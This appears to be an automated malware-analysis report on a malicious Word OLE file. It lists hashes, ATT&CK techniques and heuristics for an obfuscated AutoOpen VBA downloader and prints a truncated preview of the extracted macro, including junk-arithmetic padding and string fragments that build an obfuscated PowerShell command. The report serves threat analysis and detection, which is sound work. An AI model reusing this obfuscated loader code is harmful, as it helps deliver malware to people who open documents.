Office (OLE) malware analysis — malicious · 8ef87a2a01bdb5da

MALICIOUS

Office (OLE)

233.8 KB Created: 2018-07-06 23:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 6c79bd7cbb7719b4264e2d5392ff4ada SHA-1: 4368bc4d0cf54ec59674d3dad6fbc38725ccd3cc SHA-256: 8ef87a2a01bdb5da35e33fd2280d1331196df02bb6f724756fa262dbdda3b348

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader. The AutoOpen macro uses CreateObject and Shell() calls, which are often used to download and execute further stages. The script attempts to construct a PowerShell command, likely to download a second-stage payload, and the presence of a Run key suggests persistence. The overall pattern points to a macro-based downloader.

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16824 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16824 bytes
SHA-256: `769fea5ef1adac3fe0d87f01df06952533a5d26eebe1447bd10fc351f1164b0a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RoRObvBKJjqLPh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next sLJWi = zPfia / BPQiVt * BomiHQ - uTPNI + 4809 - EMmYzi / 75022 - EQBKp jFMPbH = alOQUi / EXEaF * BOEmvR - phdBTs + 87716 - azVikq / 79191 - kbTKs frVOU = QpCvR / hOrCh * wdsBR - NEwhT + 18729 - QTvfk / 73065 - WfOisO zhYiiV = ZUJYI / IMwbod * YjrVnM - TKcHr + 82610 - iUvKPQ / 49301 - BYLiw fIzXv = GcBFa / dzRVX * wDdJY - DjkWh + 93808 - dnFjEJ / 58855 - lGKWrE EwfmVi = kWklT / ikuFi * jYPMMt - KzTmjJ + 77120 - jXCJFw / 69109 - NUXKS jqBfzPbjwfUXfn (OhwctIkkaRz + izoCt + IruUzWcjI) RNHjQ = lStjTF / jDbfS * MsvZw - ECsoiW + 15710 - DVTBId / 83101 - jQYfdC rGEOT = pOhWHK / iOrmqK * NSkHn - NhQDh + 91809 - GjBal / 98980 - MKtWw wizAJ = WnJjM / tdLJLi * OjZXp - aIiAT + 42220 - YasDW / 15539 - jwjsc End Sub Attribute VB_Name = "iRGtCRGrY" Function OhwctIkkaRz() On Error Resume Next zinRM = 87847 / sDADDj * 53406 - 51557 / 17361 * zJBUBp / KVrXmR - wMniB - (zzifw / 30683 / JCAsIj + qEjrv - (uHqCWF + sErwwZ)) auGjka = 70890 / RKIwM * 362 - 34655 / 35399 * tXcCGW / iUknG - pNNdB - (pzkzuY / 6074 / wrhwn + CTvIj - (XjzPq + IEVulj)) dbJaid = 7050 / YqnmA * 91562 - 19344 / 42291 * EuhRF / UGzQw - DGwzKh - (JVaGPF / 22395 / cDzMu + cjpQLX - (pTlNF + UjpmpN)) CBcsRZ = "wershell" + " " + " " + " &" + Chr(40) + Chr(40) + "geT-" + "vARiA" + "BLe '" + "MDr'" + Chr(41) + "." + "NAme[3,1" + "1,2]-JOi" + "n''" + Chr(41) + Chr(40) + "-" + "JOIn" iViSj = 88819 / lCtrt * 44740 - 42623 / 37897 * jsAFY / VdjMFj - ATrsrs - (sMQsCP / 42597 / SNWrH + nizilp - (EiToio + azAjd)) njAwdz = 8065 / jSHOZk * 31185 - 74289 / 27938 * tIWJmN / daniZY - odOpna - (OmoqG / 36926 / sXtrj + XUaiw - (UAYQKG + NavWaz)) fWXlEj = 16144 / wOGNR * 89992 - 60990 / 90969 * MGrIbI / dsFLEv - YUqYKU - (kLzWD / 14395 / YaJLAN + BsqEN - (IMizQC + htaWVb)) usmXBs = 9922 / vzDiW * 44695 - 54203 / 611 * woBYh / FAbRf - npZnlG - (DjMnCu / 66288 / MUJKQa + ZnYCN - (hWZaZR + KdvkQ)) DPsKEB = Chr(40) + Chr(40) + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64" jrNMZB = 6378 / UQwOn * 3336 - 25988 / 10801 * fPibhQ / YXQiub - RRjckq - (IhHpa / 94364 / nKabsL + CMPCbn - (BkZNsl + zEZcOs)) cHDJT = 96964 / WpNcE * 26240 - 71373 / 85333 * FDwod / DTaUzS - qOlhP - (rfcWB / 86740 / iaFko + HraaWW - (fEjizB + JwzqWw)) dchzv = 32270 / dNqfI * 21965 - 42008 / 30648 * PKVanv / WAADfa - NqJGN - (sYbdNa / 42871 / TsjniM + LcENhi - (zuNmC + cpwEIR)) pJqNmAwjsps = " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12" lHTjlN = 79972 / BQBOE * 38529 - 50825 / 17291 * NGzhc / LKpGBz - TFVliu - (DCovX / 21998 / jRtkwT + iQktJ - (HZwGo + XwwsT)) AALRBK = 32900 / ctwWC * 60656 - 35976 / 79349 * lrUVBi / hHUnf - YZuTTL - (ziisT / 60011 / zklXFH + HbVJw - (Fkuqd + pUWcjM)) plnuUI = "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , " mikfwC = 92423 / NqCCb * 31934 - 29298 / 39444 * DSBSs / jpPPOC - wcdbmv - (YwjwS / 91565 / HaIAvN + RLjbuF - (phmhJ + uaZAdT)) DJcCWw = 12285 / VwiYfR * 96085 - 47994 / 18242 * pNPnr / sqKcI - LzkSD - (sHcXz / 74280 / tuBJD + DZrSI - (PROJjo + pTllnN)) jCsROc = 27752 / TrjHEE * 53886 - 38560 / 59145 * roBizw / VzFIJO - qtWXzA - (zBTuSz / 63513 / krRGL + ZiCEv - (sfJpKc + RKhEUd)) ZmZdQ = "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , " jbiMAj = 89216 / FTlVi * 71345 - 54317 / 11027 * dnUzZ / faIBo - RiJPGU - (NzfEc / 93537 / iiYAO + lzktY - (JWzmsh + YopcF)) mEzwi = 54515 / HPTpC * 59440 - 32947 / 93090 * sqRjRu / JVEhA - WcKqN - (cbzbY / 50677 / WNTXPJ + AlckLm - (oqaZvP + triMRr)) uPtIr = 44980 / pwpXX * 16268 - 70440 / 98422 * iahnkW / cLbdW - KzRJbr - (qCvUn / 2834 / kXsqIs + irKjo - (NRzPt + znrGNh)) MEBJhYpP = "93 ,93 ,4" + " , ... (truncated)

SHA-256: 769fea5ef1adac3fe0d87f01df06952533a5d26eebe1447bd10fc351f1164b0a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RoRObvBKJjqLPh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   sLJWi = zPfia / BPQiVt * BomiHQ - uTPNI + 4809 - EMmYzi / 75022 - EQBKp
   jFMPbH = alOQUi / EXEaF * BOEmvR - phdBTs + 87716 - azVikq / 79191 - kbTKs
   frVOU = QpCvR / hOrCh * wdsBR - NEwhT + 18729 - QTvfk / 73065 - WfOisO
   zhYiiV = ZUJYI / IMwbod * YjrVnM - TKcHr + 82610 - iUvKPQ / 49301 - BYLiw
   fIzXv = GcBFa / dzRVX * wDdJY - DjkWh + 93808 - dnFjEJ / 58855 - lGKWrE
   EwfmVi = kWklT / ikuFi * jYPMMt - KzTmjJ + 77120 - jXCJFw / 69109 - NUXKS
jqBfzPbjwfUXfn (OhwctIkkaRz + izoCt + IruUzWcjI)
   RNHjQ = lStjTF / jDbfS * MsvZw - ECsoiW + 15710 - DVTBId / 83101 - jQYfdC
   rGEOT = pOhWHK / iOrmqK * NSkHn - NhQDh + 91809 - GjBal / 98980 - MKtWw
   wizAJ = WnJjM / tdLJLi * OjZXp - aIiAT + 42220 - YasDW / 15539 - jwjsc
End Sub


Attribute VB_Name = "iRGtCRGrY"
Function OhwctIkkaRz()
On Error Resume Next
zinRM = 87847 / sDADDj * 53406 - 51557 / 17361 * zJBUBp / KVrXmR - wMniB - (zzifw / 30683 / JCAsIj + qEjrv - (uHqCWF + sErwwZ))
   auGjka = 70890 / RKIwM * 362 - 34655 / 35399 * tXcCGW / iUknG - pNNdB - (pzkzuY / 6074 / wrhwn + CTvIj - (XjzPq + IEVulj))
   dbJaid = 7050 / YqnmA * 91562 - 19344 / 42291 * EuhRF / UGzQw - DGwzKh - (JVaGPF / 22395 / cDzMu + cjpQLX - (pTlNF + UjpmpN))
CBcsRZ = "wershell" + "         " + "       " + "   &" + Chr(40) + Chr(40) + "geT-" + "vARiA" + "BLe '" + "*MDr*'" + Chr(41) + "." + "NAme[3,1" + "1,2]-JOi" + "n''" + Chr(41) + Chr(40) + "-" + "JOIn"
iViSj = 88819 / lCtrt * 44740 - 42623 / 37897 * jsAFY / VdjMFj - ATrsrs - (sMQsCP / 42597 / SNWrH + nizilp - (EiToio + azAjd))
   njAwdz = 8065 / jSHOZk * 31185 - 74289 / 27938 * tIWJmN / daniZY - odOpna - (OmoqG / 36926 / sXtrj + XUaiw - (UAYQKG + NavWaz))
   fWXlEj = 16144 / wOGNR * 89992 - 60990 / 90969 * MGrIbI / dsFLEv - YUqYKU - (kLzWD / 14395 / YaJLAN + BsqEN - (IMizQC + htaWVb))
   usmXBs = 9922 / vzDiW * 44695 - 54203 / 611 * woBYh / FAbRf - npZnlG - (DjMnCu / 66288 / MUJKQa + ZnYCN - (hWZaZR + KdvkQ))
DPsKEB = Chr(40) + Chr(40) + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64"
jrNMZB = 6378 / UQwOn * 3336 - 25988 / 10801 * fPibhQ / YXQiub - RRjckq - (IhHpa / 94364 / nKabsL + CMPCbn - (BkZNsl + zEZcOs))
   cHDJT = 96964 / WpNcE * 26240 - 71373 / 85333 * FDwod / DTaUzS - qOlhP - (rfcWB / 86740 / iaFko + HraaWW - (fEjizB + JwzqWw))
   dchzv = 32270 / dNqfI * 21965 - 42008 / 30648 * PKVanv / WAADfa - NqJGN - (sYbdNa / 42871 / TsjniM + LcENhi - (zuNmC + cpwEIR))
pJqNmAwjsps = " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12"
lHTjlN = 79972 / BQBOE * 38529 - 50825 / 17291 * NGzhc / LKpGBz - TFVliu - (DCovX / 21998 / jRtkwT + iQktJ - (HZwGo + XwwsT))
   AALRBK = 32900 / ctwWC * 60656 - 35976 / 79349 * lrUVBi / hHUnf - YZuTTL - (ziisT / 60011 / zklXFH + HbVJw - (Fkuqd + pUWcjM))
plnuUI = "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , "
mikfwC = 92423 / NqCCb * 31934 - 29298 / 39444 * DSBSs / jpPPOC - wcdbmv - (YwjwS / 91565 / HaIAvN + RLjbuF - (phmhJ + uaZAdT))
   DJcCWw = 12285 / VwiYfR * 96085 - 47994 / 18242 * pNPnr / sqKcI - LzkSD - (sHcXz / 74280 / tuBJD + DZrSI - (PROJjo + pTllnN))
   jCsROc = 27752 / TrjHEE * 53886 - 38560 / 59145 * roBizw / VzFIJO - qtWXzA - (zBTuSz / 63513 / krRGL + ZiCEv - (sfJpKc + RKhEUd))
ZmZdQ = "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , "
jbiMAj = 89216 / FTlVi * 71345 - 54317 / 11027 * dnUzZ / faIBo - RiJPGU - (NzfEc / 93537 / iiYAO + lzktY - (JWzmsh + YopcF))
   mEzwi = 54515 / HPTpC * 59440 - 32947 / 93090 * sqRjRu / JVEhA - WcKqN - (cbzbY / 50677 / WNTXPJ + AlckLm - (oqaZvP + triMRr))
   uPtIr = 44980 / pwpXX * 16268 - 70440 / 98422 * iahnkW / cLbdW - KzRJbr - (qCvUn / 2834 / kXsqIs + irKjo - (NRzPt + znrGNh))
MEBJhYpP = "93 ,93 ,4" + " ,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.